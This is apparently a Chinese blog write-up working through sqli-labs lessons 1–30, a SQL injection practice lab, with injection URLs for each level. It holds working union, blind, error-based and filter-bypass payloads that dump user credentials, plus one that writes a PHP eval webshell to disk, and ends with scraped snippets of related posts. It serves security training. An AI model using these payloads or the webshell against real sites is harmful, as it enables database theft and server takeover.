SQL Labs刷题补坑记录(less1-less30)

补坑加1,这几天快速刷一下sqllabs 来巩固下sql注入基础吧,也算是把很久以前没刷的过一遍,do it!

第一部分:

LESS1:

直接报错,有回显的注入,

http://localhost/sqli-labs-master/Less-1/?id=1‘ order by 3--+

就可以确定字段然后使用union查询即可

http://localhost/sqli-labs-master/Less-1/?id=-1‘ union select 1,2,3--+

接下来就是常规的查库:

http://localhost/sqli-labs-master/Less-1/?id=-1‘ union select 1,2,group_concat(schema_name) from information_schema.schemata--+

查当前数据库

http://localhost/sqli-labs-master/Less-1/?id=-1‘ union select 1,2,database()--+

查表

http://localhost/sqli-labs-master/Less-1/?id=-1‘ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security‘--+

查字段:

http://localhost/sqli-labs-master/Less-1/?id=-1‘ union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users‘--+

查数据:

http://localhost/sqli-labs-master/Less-1/?id=-1‘ union select 1,group_concat(username),group_concat(password) from users--+

LESS2:

这个是数字型,不用加‘单引号,查数据套路和less1一样

确定字段数

http://localhost/sqli-labs-master/Less-2/?id=1 order by 3

LESS3:

闭合方式为’)

http://localhost/sqli-labs-master/Less-3/?id=1‘) order by 3--+

确定字段后union查询即可

LESS4:

闭合方式为“)

确定字段后union查询即可

http://localhost/sqli-labs-master/Less-4/?id=1") order by 3-- +

LESS5:

这关sql语句正确与否不再返回数据,只返回you are in或者错误提示,因此是盲注

正确情况下,有数据:

http://localhost/sqli-labs-master/Less-5/?id=-1‘ or left(user(),1)="r"--+

正确情况下,无数据:

http://localhost/sqli-labs-master/Less-5/?id=-1‘ or 0--+

sql语句直接错误:

http://localhost/sqli-labs-master/Less-5/?id=-1‘

所以对应三种情况,我们只需要关心前两种即可进行基于时间的盲注和基于布尔的盲注,错误时可以基于报错的盲注:

基于bool:

判断当前库:

http://localhost/sqli-labs-master/Less-5/?id=-1‘ or 1=(left((select database()),1)=‘s‘)--+

用left,依次判断即可,left(str,2)="se",left(str,3)="sec",或者用right函数是一样的含义,从右开始截取

判断库中表:

http://localhost/sqli-labs-master/Less-5/?id=-1‘ or 1=(left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)=‘s‘)--+

放在burp中秒出第一位为字母e,其它同,只需要更换limit即可,limit 0,1表示从下标为0取一条数据

这里需要截取字符串,那么除了left,还可以用substr+ascii

http://localhost/sqli-labs-master/Less-5/?id=-1‘ or 1=(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=1)--+

或者用mid加ord,与substr+ascii是一模一样的效果

http://localhost/sqli-labs-master/Less-5/?id=-1‘ or 1=(ord(mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=1)--+

但是上面的字符串截取函数都需要用到,逗号,要是逗号用不了则需要考虑用正则匹配:

regexp:

查库

http://localhost/sqli-labs-master/Less-5/?id=-1‘ or 1=(select database() regexp ‘^s‘)--+

查数据时这样用:

http://localhost/sqli-labs-master/Less-5/?id=-1‘ or 1=(select 1 from information_schema.tables where table_schema=‘security‘ and table_name regexp ‘^r‘)--+

构造一个where链接,那么此时就会用所有的表名来与正则进行匹配,从而得到所有的表明,不需要用到逗号。

或者用like 来进行正则匹配也可以:

http://localhost/sqli-labs-master/Less-5/?id=-1‘ or 1=(select 1 from information_schema.tables where table_schema=‘security‘ and table_name like ‘r%‘)--+

当然除了从^以开头来匹配,也可以使用$从后开始判断。

当然这里是因为前端回显了两种有无数据的情况,要是执行了语句不回显,那可以用到延时注入:

延时注入,肯定要用到逻辑判断条件体,比如 if

这里只要结合到上面布尔盲注中截取字符串所获得的逻辑判断条件来构成if的条件即可

例子:

http://localhost/sqli-labs-master/Less-5/?id=-1‘ or if(1=1,sleep(3),sleep(5))--+

只要将1=1切换成其它逻辑条件即可

报错注入:

因为这里sql语句错误时直接报错,所以可以通过报错带出数据库中的信息:

  • BigInt等数据类型溢出
  • xpath语法错误
  • count()+rand()+group_by()导致逐渐重复
  • 空间数据类型函数错误

例子1:

select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2));

但是这里用到了系统表,当系统表被过滤时,可以用:

当然from 后面的a表只要字段数大于2即可,因此也可以这样:

报错注入时每次只能有一行一列数据,所以dump数据时要和limit相结合:

当然这里要用到union联合,因为这里相当于把数据回显到前端来,因此必须dump出来字段和原来sql语句中字段数是相等的,因此还是得先判断原来的表有多少列,这里dump表和列还是得用到系统表,除非表和列名已知

http://localhost/sqli-labs-master/Less-5/?id=-1‘ union select 1,2,count(*) from (select 1 union select 2 union select 3)a group by concat((select table_name from information_schema.tables where table_schema=‘security‘ limit 0,1),floor(rand(0)*2))--+

利用 double 数值类型超出范围进行报错注入

http://localhost/sqli-labs-master/Less-5/?id=-1‘ union select 1,2,(exp(~(select * from (select user())a)))--+

这里因为版本mysql版本原因不再演示,exp就是e的多少次,超过709会溢出报错,所以来带出数据。

接下来还有bigint型注入

union select !(select * from (select user())a)-~0

还有xpath型注入:

主要与两个函数相关,义格式updatexml,一个是extractvalue,区别是updatexml有三个参数,extractvalue只需要有两个参数即可。

http://localhost/sqli-labs-master/Less-5/?id=1‘ union select 1,2,(extractvalue(1,concat(0x7e,(select user()),0x7e)))--+

查数据

http://localhost/sqli-labs-master/Less-5/?id=1‘ union select 1,2,(extractvalue(1,concat(0x7e,(select group_concat(username) from users),0x7e)))--+

http://localhost/sqli-labs-master/Less-5/?id=1‘ union select 1,2,(updatexml(1,concat(0x7e,(select group_concat(username) from users),0x7e),1))--+

这里extractvalue和updatexml带出的数据都有长度限制,因此结合字符串截取函数mid或者substr来依次截取即可:

http://localhost/sqli-labs-master/Less-5/?id=1‘ union select 1,2,(updatexml(1,concat(0x7e,mid((select group_concat(username) from users),2,10),0x7e),1))--+

如果这里concat用不了的话还可以用其他的字符串连接函数来代替,用字符串连接函数查出的数据更完整

reverse()

make_set()

如果不用concat连接的话如下图:

或者利用name_const数据重复性:

http://localhost/sqli-labs-master/Less-5/?id=1‘ union select 1,2,3 from (select name_const(version(),1),name_const(version(),1))x--+

但是这种方法貌似dump不出来其它数据,其它报错的函数现查就可以,没必要全部记住,贴一个报错函数链接

http://www.zhutougg.com/2017/01/16/mysqlshu-ju-ku-de-12chong-bao-cuo-zhu-ru/

Less-6

http://localhost/sqli-labs-master/Less-6/?id=-1" or 1--+

这一关和第五关一样,也是盲注,闭合括号的方式变了。

Less-7

http://localhost/sqli-labs-master/Less-7/?id=-1‘)) union  select 1,2,‘<?php @eval($_GET[1]); ?>‘ into outfile "G:\\ww.php"-- +

直接写入一句话即可

Less-8

http://localhost/sqli-labs-master/Less-8/?id=-1‘ or 1=0--+

直接盲注即可,没有报错信息,不能报错盲注,只能布尔或者延时

http://localhost/sqli-labs-master/Less-8/?id=-1‘ or if(1=0,1,0)--+

用延时函数sleep不一定要用if,比如:

Less-9

这一关无论怎么闭合回显都是一样的,因此布尔盲注肯定不行了,报错也不行,那么尝试延时注入

localhost/sqli-labs-master/Less-9/?id=1‘ or sleep(5)--+ 即可

Less-10

localhost/sqli-labs-master/Less-10/?id=1" or sleep(5)--+

方法和9一样,闭合变成了双引号。

LESS11:

这里是post型注入,登录

admin‘ or ‘1 即可

LESS12:

括号闭合方式不同,"双引号闭合,

admin" )or 1#即可

LESS13:

admin‘ 报错了,那么可以尝试报错注入

admin‘) or 1# 显示登录成功,admin‘) or 0#登录失败,可以布尔盲注

报错注入:

admin‘) order by 2# 正常

admin‘)  order by 3# 不正常

admin‘) union select 1,extractvalue(1,concat(0x7e,(select user()),0x7e)) # 结果如下图

进一步dump数据也是可以的

admin‘) union select 1,extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_scheme = ‘security‘),0x7e))#

数据太多只需要字符串截取函数截取一下就可以

admin‘) union select 1,extractvalue(1,concat(0x7e,substring((select group_concat(table_name) from information_schema.tables where table_scheme = ‘security‘),1,8),0x7e))#

LESS14:

闭合括号方式和13不同为",其他相同,盲注和报错注入都可以

LESS15:

这一关没有报错提示,因此不能报错注入,括号闭合为‘单引号,

a‘ or 1#  success

a‘ or 0#  filed

因此可以bool盲注或者时间盲注

LESS16:

这一关和15一样,只是括号闭合方式为 ")

布尔盲注或者延时都可以

LESS17:

update型注入,修改密码处,password处随手‘ 单引号报错了,此时回显了逻辑

源码里面对uname进行了过滤

所以uname肯定不能注入了

并且在查到已经存在的用户才能够代入update进行更新,因此,所以用户名才要填admin

这里密码最好存的时候hash一下就好了,直接代入肯定有问题,update型注入和select 注入语法差不多,当然这里肯定可以用报错注入,但是不能够布尔盲注,因为这里update不会显示更新失败,除非是语句执行错误,

这里是没有逻辑的正确和错误的,所以盲注只能用延时注入,password 直接‘ or sleep(5)#即可,其他payload都是一样的

LESS18:

这一关考的是http header头注入,比如这里可以对ua进行注入:

LESS19:

对refeer进行诸注入,和18一样的

LESS20:

这里把第一次的用户名设置到cookie里,第二次又取cookie里的用户名进行了查询,所以cookie可以注入

LESS21:

这一关对cookie进行了base64编码,所以payload对应编码即可

LESS22:

与21一样,只是括号的闭合方式变了,变为双引号

LESS23:

这道题对注释符号进行了过滤并执行sql,所以必须采用闭合的方式来注入,闭合id即可,这里可以使用联合查询方式

LESS24:

这道题可以看成是是update型,

通过注入admin‘ # 来闭合sql语句,首先注册一个普通用户,admin‘ #,然后再更新密码,

UPDATE users SET passwd="New_Pass" WHERE username =‘ admin‘ # ‘ AND password=‘‘ 从而修改了admin的密码,达到二次注入的效果。

这里在注册的时候虽然对用户名和密码中的恶意字符转义了,但是在改密码时却没有再次进行过滤,导致注入。

LESS25:

这一关主要对or和and进行了过滤

一般逻辑可以用and,&& ,|| 或者or ,^异或,双写,大小写来绕过,这里i不能大小写

当然我们可以用异或来注入,或者用&& || 来注入,or一般也可以用/*or*/进行绕过

LESS26:

这一关过滤的比较多,对空格也进行了过滤,在linux平台上

空格可以代替为:

/**/

%09 TAB 键(水平)

%0a 新建一行

%0c 新的一页

%0d return 功能

%0b TAB 键(垂直)

%a0 空

可以进行union 报错注入,延时或者布尔都可以

LESS27:

这一关主要过滤了union和select,但是可以双写或大小写绕过

可以报错注入:

1‘ and extractvalue(1,concat(0x7e,(selEct group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e)) and ‘1‘=‘1

LESS28:

本题与27差不多,只是括号的闭合方式改变了,变为‘单引号加括号,实际黑盒测试可以直接慢慢测。

LESS29:

单引号闭合,还没有过滤,盲注或者报错都可以或者直接联合查询

LESS30:

这个题主要是有两层服务器的原因,造成http传递的参数服务器接收到的不同

第一层是tomcat,第二层是apache,比如index.php?id=1&id=1‘ or 1# ,那么tomcat获取到的是第一个id,apache获取到的是第二个id,因此注入语句可以成功。

只要匹配到id参数,就截取它的值并返回,并不管后面是不是还有对id参数的重复赋值,从而导致后面的服务器在此获取参数时出错

原文地址:https://www.cnblogs.com/wfzWebSecuity/p/11330843.html

时间: 2024-11-05 14:53:48

SQL Labs刷题补坑记录(less1-less30)的相关文章

SQL Labs刷题补坑记录(less54-less65)

LESS54: 只有10次尝试,dump处secret key 直接union 查就可以,括号为单引号闭合 LESS55: 尝试出来闭合的方式为)括号,后面操作与54相同 LESS56: 尝试出来括号闭合方式为'),其它与54相同 LESS57: 括号闭合方式为"双引号,其他与前面相同 LESS58: 单引号报错,出错位置在limit,那么直接报错注入,后面就是常规的查表查字段操作 LESS59: 尝试单引号报错了,从报错来看应该不需要单引号,所以常规报错注入 LESS60: 添加双引号报错了,

SQL Labs刷题补坑记录(less31-less53)

LESS31: 双引号直接报错,那么肯定可以报错注入,并且也过滤了一些东西,^异或没有过滤,异或真香 -1" and (if(length(database())=8,1,0)) and "1 这个payload可以 LESS32: 发现'被转移了,尝试宽字节绕过,\反斜杠是%5c,前面拼接成%df就是一个汉字,要求mysql的字符集是GBK,即两个字符为一个汉字 LESS33: 还是宽字节和32一样: -1%df%27%20or%20exp(~(select%20*%20from%2

Pikachu靶场SQL注入刷题记录

数字型注入 0x01 burp抓包,发送至repeater 后面加and 1=1,and 1=2 可判断存在注入 0x02 通过order by判断字段数,order by 2 和order by 3 返回结果不同,可得字段数为2 0x03 查看表名: union select 1,group_concat(table_name) from information_schema.tables where table_schema = database() 0x04 查询users表中的数据: u

[2015.6.28] OI刷题记录

FZSZOJ刷题记录: 1051 砝码称重: DP 多重背包 1058 liqeuer: 序列DP 1061 挖地雷:DP,注意需要倒过来做DP,同时记录路径. 1059 Number:DP 1054 数塔问题:同数字三角形,普通DP 1390 等式问题:爆搜,枚举每个+号或-号的位置 1006 中位数:维护大根堆+小根堆,每次插入调整 1005 Cube Stacking:并查集维护当前在第几个和当前集合的高度,并查集变种. 1073 DNA分子的最佳比对:序列DP 1110 奖学金:傻逼题,

BZOJ 刷题记录 PART 3

[前言]还是强调要少看题解. [BZOJ1090]简单的区间DP.值得注意的是:在压缩的时候,如果是10个A压缩,那么化成(10)A后有5个字符而不是4个!(我在这里被坑了好长时间!)以下是核心代码: for (len=2;len<=L;len++) for (i=1;i<=L-len+1;i++) { j=i+len-1; for (k=i;k<j;k++) f[i][j]=min(f[i][j],f[i][k]+f[k+1][j]); for (l=1;l<=len/2;l++

DP刷题记录

目录 dp刷题记录 codeforces 706C codeforces 940E BZOJ3997 POJ2279 GYM102082B GYM102082D codeforces132C L3-020 至多删三个字符 牛客 553C Chino with Queue POJ3260 The Fewest Coins Codeforces 372C dp刷题记录 codeforces 706C 题意:给出n个字符串,可以对每个字符串进行翻转操作, 每个操作对应一个消耗c[i],问经过操作后是否

刷题记录:[De1CTF 2019]Giftbox &amp;&amp; Comment

目录 刷题记录:[De1CTF 2019]Giftbox && Comment 一.知识点 1.sql注入 && totp 2.RCE 3.源码泄露 4.敏感文件读取 刷题记录:[De1CTF 2019]Giftbox && Comment 题目复现链接:https://buuoj.cn/challenges 参考链接:De1CTF Web WriteUp BUUCTF平台 web writeup 第三弹 一.知识点 1.sql注入 && t

刷题记录:[EIS 2019]EzPOP

目录 刷题记录:[EIS 2019]EzPOP 知识点 编码写shell绕过 base64工作机制 绕过后缀名检查 刷题记录:[EIS 2019]EzPOP 题目复现链接:https://buuoj.cn/challenges 知识点 编码写shell绕过 $data = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $data; $result = file_put_conte

2.1【欢乐向】逆向刷题被虐哭日常记录

2.1[欢乐向]逆向刷题被虐哭日常记录 前面好多题之前做了也没记录,懒得整了,直接从剩下的几个开始: Getit 这一段是解密的关键,后面的是把flag写入文档又给删了. 其实可以修改程序逻辑让他别删,但是我不会. ? 逆着来推一边,不会写py,用c写个. ? ? ?不应当,我大概是忘了加括号. ? ???我觉得我的没啥问题,去网上查了查相关的: ? ? ? 在IDA里没看到有S,咱也不知道咋回事. ? ? ? ? ? no-strings-attached 直接扔IDA瞅瞅: ? ? 挨个函数